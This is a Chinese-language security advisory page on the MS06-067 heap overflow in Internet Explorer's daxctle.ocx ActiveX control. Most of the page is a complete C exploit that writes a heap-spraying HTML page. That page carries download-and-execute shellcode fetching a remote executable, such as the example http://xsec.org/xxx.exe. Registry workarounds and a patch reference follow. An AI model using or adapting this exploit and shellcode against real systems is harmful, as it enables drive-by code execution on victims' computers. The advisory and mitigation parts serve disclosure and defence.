首页 -> 安全研究

安全研究

安全漏洞
Microsoft IE daxctle.ocx KeyFrame方法堆溢出漏洞(MS06-067)

发布日期:2006-09-13
更新日期:2006-11-15

受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4
描述:
BUGTRAQ  ID: 20047
CVE(CAN) ID: CVE-2006-4777

Internet Explorer是一款微软开发的非常流行的WEB浏览器。

Microsoft IE的daxctle.ocx ActiveX控件实现上存在堆溢出漏洞,远程攻击者可能利用此漏洞在在用户机器上执行任意指令。

Multimedia Controls ActiveX控件(daxctle.ocx)的CPathCtl::KeyFrame()函数存在溢出漏洞。如果HTML文档处理对ActiveX控件的KeyFrame()方式所传送的特制参数,则用户受骗访问了这样的恶意HTML文档就会导致执行任意代码。

<*来源:nop (nop@xsec.org
  
  链接:http://secunia.com/advisories/21910
        http://www.microsoft.com/technet/security/bulletin/ms06-067.mspx
        http://www.us-cert.gov/cas/techalerts/TA06-318A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*
*-----------------------------------------------------------------------
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec
Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server SP4 CN
* : + Internet Explorer 6.0 SP1
* : Windows XP SP2 CN
* : + Internet Explorer 6.0 SP1 (You need some goodluck! :-)
* :
* Complie : cl daxctle2.c
* :
* Usage :d:\>daxctle2
* :
* :Usage: daxctle <URL> [htmlfile]
* :
* :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

// Download Exec Shellcode by nop
unsigned char sc[] =
"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00"
"\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95"
"\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x04"
"\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33"
"\xc0\x50\x50\x53\x57\x50\xff\x56\x10\x8b\xdc\x50\x53\xff\x56\x08"
"\xff\x56\x0c\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b"
"\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10"
"\x3a\xd6\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7"
"\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b"
"\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x58\xff\xff\xff\x8e\x4e\x0e"
"\xec\xc1\x79\xe5\xb8\x98\xfe\x8a\x0e\xef\xce\xe0\x60\x36\x1a\x2f"
"\x70";

char * header =
"<html>\n"
"<head>\n"
"<title>XSec.org</title>\n"
"</head>\n"
"<body>\n"
"<script>\n"
"shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u4343\" + \n";

// Change this script by yourself.
char * footer =
"bigbk = unescape(\"%u0D0D%u0D0D\");\n"
"headersize = 20;\n"
"slackspace = headersize + shellcode.length\n"
"while (bigbk.length < slackspace) bigbk += bigbk;\n"
"fillbk = bigbk.substring(0, slackspace);\n"
"bk = bigbk.substring(0, bigbk.length-slackspace);\n"
// bk = nop+nop ;-)
"while(bk.length+slackspace < 0x40000) bk = bk + bk + fillbk;\n"
"memory = new Array();\n"
"for (i=0;i<800;i++) memory[i] = bk + shellcode;\n"
"var target = new ActiveXObject(\"DirectAnimation.PathControl\");\n"
"target.KeyFrame(0x7fffffff, new Array(1), new Array(65535));\n"
"</script>\n"
"</body>\n"
"</html>\n";

// print unicode shellcode
void PrintUc(char *lpBuff, int buffsize)
{
int i,j;
char *p;
char msg[4];

for(i=0;i<buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
printf("\"\n\"");
fprintf(fp, "%s", "\" +\n\"");
}
else
{
printf("\"");
fprintf(fp, "%s", "\"");
}
}

printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);

fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}


printf("\";\n");
fprintf(fp, "%s", "\");\n");


fflush(fp);
}

void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};

int sc_len = 0;


if (argc < 2)
{
printf("Internet Explorer COM Object Remote Heap Overflow Download Exec Exploit\n");
printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org\n");
//printf("!!! 0Day !!! Please Keep Private!!!\n");
printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]);
exit(1);
}

url = argv[1];

//if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 60)
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
//printf("[-] Invalid url. Must start with 'http://','ftp://' and < 60 bytes.\n");
printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
return;
}

printf("[+] download url:%s\n", url);

if(argc >=3) file = argv[2];
printf("[+] exploit file:%s\n", file);

fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!\n");
return;
}

// print html header
fprintf(fp, "%s", header);
fflush(fp);

// print shellcode
memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));

sc_len += strlen(url)+1;
PrintUc(buf, sc_len);

// print html footer
fprintf(fp, "%s", footer);
fflush(fp);

printf("[+] exploit write to %s success!\n", file);
}

建议:
临时解决方法:

* 禁止在Internet Explorer中运行Microsoft DirectAnimation Path ActiveX控件。请将以下文本粘贴于记事本等文本编辑器中。然后,使用.reg文件扩展名保存文件:
    
Windows注册表编辑器5.00版

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}]
"Compatibility Flags"=dword:00000400

您可以通过双击此.reg文件将其应用到各个系统。还可以使用组策略跨域应用该文件。
    
* 将Internet和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。
* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件之前进行提示。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-067)以及相应补丁:
MS06-067:Cumulative Security Update for Internet Explorer (922760)
链接:http://www.microsoft.com/technet/security/bulletin/ms06-067.mspx

浏览次数:3366
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障